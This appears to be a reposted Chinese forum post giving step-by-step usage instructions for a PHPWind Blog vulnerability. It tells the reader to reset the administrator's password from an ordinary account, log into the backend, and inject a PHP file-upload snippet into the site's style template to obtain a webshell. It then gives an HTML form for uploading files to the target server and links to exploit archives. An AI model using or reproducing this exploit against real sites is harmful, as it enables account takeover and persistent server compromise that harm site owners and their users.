[转载]PHPWindBlog漏洞使用说明
作者:BCT小组 文章来源:九小的blog1:注册一个新的blog 然后登录!
2:查看管理员帐号!
3:修改管理员密码!帐号的地方直接写管理员帐号,密码的地方填上自己想改的密码
4:用刚才修改过后的帐号和密码直接登录后台!
5:拿WebShell方法:
进后台找到“网站风格设置” 在里面加上以下代码,(切记)得要顶部写,代码如下:
<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<!--
<?php
print <<<EOT
-->
然后在本地新建一个提交表单代码如下:
<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/index.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
敬告:利用此程序造成的一切后果由使用者自负!与程序作者无关!
漏洞资料来源:BCT小组 [url=http://www.cnbct.org] [url]http://www.cnbct.org[/url][/url]
附件 1: [url=http://forum.wrsky.com/attachment.php?aid=90&checkid=42082&download=1] phpwindblog.rar[/url]
附件 2: [url=http://www.cnbct.org/exploit/phpwindblog_exp.rar]phpwindblog_exp.rar [/url]
页:
[1]